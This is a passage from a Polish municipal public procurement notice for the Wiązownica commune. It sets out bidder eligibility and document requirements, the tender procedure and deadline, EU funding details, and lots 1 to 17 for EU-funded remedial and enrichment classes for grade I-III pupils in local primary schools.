     c) dokumentów  potwierdzających, że wykazane dostawy zostały wykonane prawidłowo, 
         bez zastrzeżeń, np. referencje protokoły odbioru itp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym  zakresie. 
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
       oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli   dysponują  osobami zdolnymi do wykonania  
        zamówienia,  lub przedłożą pisemnym zobowiązaniem innych podmiotów do udostępnienia 
        tych osób, w szczególności: 
        - dysponuje minimum jedną osobą posiadającą wykształcenie kierunkowe odpowiednie  dla 
        rodzaju  poszczególnych zajęć stanowiących przedmiot zamówienia w danej części (Nr 1- 31), 
        zgodnie z kwalifikacjami określonymi w Rozporządzeniu Ministra Edukacji  Narodowej z dnia  
        03.02.2012 roku (Dz. U. z 2012r., poz. 174), w sprawie szczegółowych  kwalifikacji  
         wymaganych od nauczycieli oraz określenia szkół i wypadków, w których  można zatrudnić 
         nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia 
         nauczycieli i posiadającymi  doświadczenie pedagogiczne ( staż pedagogiczny) minimum 2 lata 
         pracy w szkole.
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
     a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
     b) wykazu osób wg. zał. do siwz.
     c) oświadczenie wykonawcy, że wskazane osoby posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym  zakresie. 
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
       oświadczenia wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz oferty;
  - parafowany projekt umowy;
  - pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia (jeżeli dotyczy);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy , 
    jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia tych zmian 
    wynika z okoliczności , których  nie można było przewidzieć w chwili zawarcia umowy.
2.	Wszelkie zmiany w umowie pod rygorem nieważności  muszą być dokonane w formie pisemnej.
1.	Zamawiający zgodnie z art. 144 ustawy Pzp. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:
1)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ.
            Przez działanie siły wyższej należy rozumieć zaistnienie zdarzenia, powstałego      
             niezależnie od  stron umowy, którego nie można było przewidzieć i któremu nie 
            można było zapobiec lub przeciwdziałać  poprzez podjęte z należytą starannością 
            działania.
2)	zmiana obowiązującej stawki VAT,
3)	zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip.wiazownica.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42
Cena dokumentacji 20 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2012 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica
Sekretariat Urzędu pok. nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest finansowany przez UE w ramach programu:
Kapitał Ludzki - Priorytet IX Działania Rozwój wykształcenia i kompetencji w regionach: 9.1.Wyrównywania szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie: 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  w szkole podstawowej w Wiązownicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
w szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 32 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
 Łączna liczba uczniów objęta zajęciami - 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  ( 2 grupy) 
w łącznym wymiarze  godzin w ilości 64 (2 grupyx32).
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 13 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze  w ilości 
32 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 5 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych, ze szczególnym 
uwzględnieniem nauk matematyczno - przyrodniczych w tym: prowadzenie obserwacji    
przyrodniczych, wykonywanie doświadczeń i eksperymentów, prowadzenie hodowli i 
obserwacje mikroskopowe, rozwijanie zainteresowań i zdolności matematycznych z 
ukierunkowaniem do udziału w konkursach mat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych, ze szczególnym 
uwzględnieniem nauk matematyczno - przyrodniczych w tym: prowadzenie obserwacji    
przyrodniczych, wykonywanie doświadczeń i eksperymentów, prowadzenie hodowli i 
obserwacje mikroskopowe, rozwijanie zainteresowań i zdolności matematycznych z 
ukierunkowaniem do udziału w konkursach matematycznych w  łącznym wymiarze  w ilości 
32 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Wiązownicy o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie w  
łącznym wymiarze w ilości 32 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 12 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 40 godz. 
Termin    realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
wymiarze w ilości 40 godz.
Termin realizacji  do dnia 30.06.2013 r.  
Łączna liczba uczniów objęta zajęciami - 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze  godzin w 
ilości 80 godzin (2 grupy x40 godz.).
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze  w ilości 40 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 7 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem umiejętności plastycznych i technicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Szówsku o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem umiejętności plastycznych i technicznych w  łącznym wymiarze  w   ilości 
40 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 35 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 7 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli)  o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli)  o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym     
wymiarze  w ilości 35 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze w ilości 
80 godzin (2 grupy x40 godz.).
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 14 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze  w ilości 
120 godz. ( 3 grupyx40 godz.)
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 28 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności teatralnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności teatralnych w  łącznym wymiarze w ilości 35 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności  plastycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności  plastycznych w  łącznym wymiarze  w ilości 35 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze  w ilości 90 godz. ( 3 grupy)    
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 11 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
